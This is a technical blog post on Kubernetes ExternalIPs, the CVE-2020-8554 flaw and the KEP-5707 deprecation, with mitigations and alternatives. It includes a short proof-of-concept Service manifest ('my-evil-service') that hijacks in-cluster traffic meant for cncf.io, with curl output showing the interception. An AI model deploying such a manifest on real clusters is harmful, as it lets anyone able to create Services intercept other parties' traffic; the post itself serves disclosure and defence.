Skip to main content

ExternalIPs Deprecated? From Design to Vulnerability to KEP-5707

·1288 words·7 mins·
ChengHao Yang
Author
ChengHao Yang
SRE / CNCF Ambassador
Table of Contents

ExternalIPs has been part of Kubernetes Service since v1.0. After 11 years, SIG Network has decided to deprecate it starting from v1.36, with plans to lock the feature after v1.43. What happened?

Let’s walk through “KEP-5707: Deprecate Service.spec.externalIPs” together!

註記

This post was written on 2026/4/18 and is based on this commit.

What is ExternalIPs?
#

Before diving into KEP-5707, let’s understand what the ExternalIPs field does.

When a Service is created, it is assigned an Internal IP by default. Pods matching the selector labels will have traffic load-balanced to them.

However, Internal IPs are only accessible within the cluster. How do you handle external traffic coming in? On public cloud Kubernetes, you simply set type: LoadBalancer and let the cloud provider handle the rest. But on private clouds without Cloud Provider support, besides type: NodePort, you’re left to handle routing through your own routers or firewalls.

Moreover, back in 2015 when this was implemented, projects like MetalLB or Cilium didn’t exist yet. How would you specify an external IP? The answer was to let users “manually” specify an External IP.

ExternalIP Service usage diagram

The design of ExternalIPs is straightforward: fill in an IP in the Service’s .spec, and kube-proxy will create iptables / IPVS rules on every node to forward traffic destined for that IP to the corresponding Service endpoints, saving the round trip to external networks.

apiVersion: v1
kind: Pod
metadata:
  name: my-app
  labels:
    app: my-app
spec:
  containers:
    - name: http-echo
      image: hashicorp/http-echo:latest
      args:
        - "-listen=:8080"
        - "-text=hello from my-app"
      ports:
        - containerPort: 8080
---
apiVersion: v1
kind: Service
metadata:
  name: my-service
spec:
  selector:
    app: my-app
  ports:
    - port: 80
      targetPort: 8080
  externalIPs:
    - 203.0.113.10

In other words, when a node receives a packet destined for 203.0.113.10, kube-proxy will forward the traffic to the backend Pod via iptables rules. Here is the implementation in kube-proxy that creates the forwarding rules for External IPs:

		// Capture externalIPs.
		for _, externalIP := range svcInfo.ExternalIPs() {
			if hasEndpoints {
				// Send traffic bound for external IPs to the "external
				// destinations" chain.
				natRules.Write(
					"-A", string(kubeServicesChain),
					"-m", "comment", "--comment", fmt.Sprintf(`"%s external IP"`, svcPortNameString),
					"-m", protocol, "-p", protocol,
					"-d", externalIP.String(),
					"--dport", strconv.Itoa(svcInfo.Port()),
					"-j", string(externalTrafficChain))
			}
			if !hasExternalEndpoints {
				// Either no endpoints at all (REJECT) or no endpoints for
				// external traffic (DROP anything that didn't get
				// short-circuited by the EXT chain.)
				filterRules.Write(
					"-A", string(kubeExternalServicesChain),
					"-m", "comment", "--comment", externalTrafficFilterComment,
					"-m", protocol, "-p", protocol,
					"-d", externalIP.String(),
					"--dport", strconv.Itoa(svcInfo.Port()),
					"-j", externalTrafficFilterTarget,
				)
			}
		}

Source: Kubernetes v1.35.4 iptables implementation

After deploying the Service above, you can see the iptables rules generated by kube-proxy on the node:

$ docker exec -it externalips-lab-worker iptables -t nat -S | grep "external IP"

-A KUBE-SERVICES -d 203.0.113.10/32 -p tcp -m comment --comment "default/my-service external IP" -m tcp --dport 80 -j KUBE-EXT-FXIYY6OHUSNBITIX

TCP packets destined for 203.0.113.10:80 are directed to the KUBE-EXT-* chain, which ultimately DNATs to the Pod IP.

However, Kubernetes itself is not responsible for making this IP routable to the node. How the external IP reaches the node is entirely the user’s responsibility.

The design seemed reasonable at the time, but a hidden danger was lurking — CVE-2020-8554.

CVE-2020-8554
#

  • 2019/12/27 champtar reported the issue
  • 2020/01/09 Confirmed as a valid vulnerability
  • 2020/03/03 Assigned CVE-2020-8554
  • 2020/12/05 Issue#97076 updated
  • 2020/12/07 PoC details published

Although Kubernetes officially disclosed CVE-2020-8554 on 2020/12/05 in Issue#97076, as of this writing, the issue remains open. This means the vulnerability still exists in current versions and has not been fixed.

The design scenario described in the previous section assumes that you own the IP you’re assigning. But what if someone sets an IP that doesn’t belong to the infrastructure — say, the CNCF website’s IP? Things get very weird.

In the following example, I create an nginx Pod and a my-evil-service Service, setting the externalIPs to CNCF’s website IP.

This experiment is adapted from a GitHub Issue#97076 comment.

apiVersion: v1
kind: Pod
metadata:
  labels:
    run: nginx
  name: nginx
spec:
  containers:
  - image: nginx:1.29.8-alpine
    name: nginx
    ports:
    - containerPort: 80
      protocol: TCP
---
apiVersion: v1
kind: Service
metadata:
  name: my-evil-service
spec:
  selector:
    run: nginx
  type: LoadBalancer
  ports:
    - name: http
      protocol: TCP
      port: 80
      targetPort: 80
  externalIPs:
    - 23.185.0.3 # cncf.io

As mentioned earlier, Kubernetes does not send ARP responses or BGP announcements for External IPs, and there is absolutely no validation mechanism. kube-proxy simply creates the iptables rules, redirecting internal traffic destined for cncf.io or 23.185.0.3 to my nginx Pod.

Traffic originally intended for the CNCF website gets hijacked by anyone with permission to create a Service.

$ kubectl run --rm -i --tty curl --image=curlimages/curl --restart=Never -- curl -I http://cncf.io
HTTP/1.1 200 OK
Server: nginx/1.29.8
Date: Sat, 18 Apr 2026 10:27:22 GMT
CVE-2020-8554 diagram

How to mitigate this? There is no patch for this issue, and no upgrade can fix it. The only option is to restrict the field usage through admission webhooks, which led to the k-sigs/externalip-webhook subproject.

Later, starting from v1.21, kube-apiserver includes a built-in DenyServiceExternalIPs admission webhook. However, it is disabled by default and requires the --enable-admission-plugins flag to enable.

If you’re using the Kyverno project, you can use the Restrict External IPs policy.

Alternatives
#

ARP (Layer 2) or BGP (Layer 3)
#

There are now many projects that implement ARP and BGP. Notable CNCF projects include MetalLB and Cilium.

Cilium LB IPAM allows you to use the lbipam.cilium.io/ips annotation to specify preferred IPs.

apiVersion: v1
kind: Service
metadata:
  name: service-blue
  annotations:
    "lbipam.cilium.io/ips": "20.0.10.100,20.0.10.200"
spec:
  type: LoadBalancer
  ports:
  - port: 1234

The MetalLB Usage page explains how to use the metallb.io/loadBalancerIPs annotation.

apiVersion: v1
kind: Service
metadata:
  name: nginx
  annotations:
    metallb.io/loadBalancerIPs: 192.168.1.100
spec:
  ports:
  - port: 80
    targetPort: 80
  selector:
    app: nginx
  type: LoadBalancer

The YAML examples above simply show how operators can reference annotations to assign IPs. Detailed configuration is beyond the scope of this post — refer to the official documentation.

Gateway API
#

Each cloud provider and CNCF project has its own implementation, so consult their documentation for details.

If you’re using Cilium Gateway API, you can directly use .spec.addresses to specify IPs.

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: my-gateway
spec:
  gatewayClassName: cilium
  addresses:
    - type: IPAddress
      value: 192.168.1.100
  listeners:
    - name: http
      protocol: HTTP
      port: 80

For cases like Istio, which isn’t directly tied to a CNI, you can use .spec.infrastructure.annotations to pass annotations to the underlying Service, letting MetalLB or Cilium assign the preferred IP.

apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
spec:
  gatewayClassName: istio
  infrastructure:
    annotations:
      lbipam.cilium.io/ips: "192.168.1.100"
  listeners:
    - name: http
      protocol: HTTP
      port: 80

Deprecation Timeline
#

  • v1.36 announces deprecation. kube-proxy adds the AllowServiceExternalIPs feature gate, defaulting to true. Set it to false to disable ExternalIPs.
  • v1.40 onwards: AllowServiceExternalIPs defaults to false.
  • v1.43 onwards: AllowServiceExternalIPs feature gate is locked.
  • v1.46 onwards: all related implementations are removed (AllowServiceExternalIPs feature gate and DenyServiceExternalIPs admission controller).

Afterword
#

In hindsight, the ExternalIPs design clearly has vulnerabilities. But back in 2015, the Cloud Native ecosystem was just getting started — there was no MetalLB, no Gateway API. On private clouds, if you wanted external traffic to reach your services, your only options besides NodePort were to figure it out yourself. Letting users directly specify an IP was the most intuitive approach at the time.

Tim Hockin, who filed the original proposal, has also acknowledged that .spec.externalIPs was a poor design. However, Kubernetes has always prioritized stability and avoiding breaking changes — even when problems are known, existing fields aren’t removed lightly.

It wasn’t until 2026, with the CNCF ecosystem maturing and viable alternatives in place, that ExternalIPs went from being “the only option” to “a legacy design with security risks” — finally making deprecation feasible.

Reference
#

Related

Kubernetes Conformance Test - Sonobuoy

·1520 words·8 mins
Numerous Kubernetes distributions (e.g., k0s, K3s, Rancher, etc.) and cloud services offering Kubernetes (e.g., GKE, AKS, EKS) are available today. But have you ever wondered why these communities or cloud providers claim to provide Kubernetes? Could I also claim to offer Kubernetes?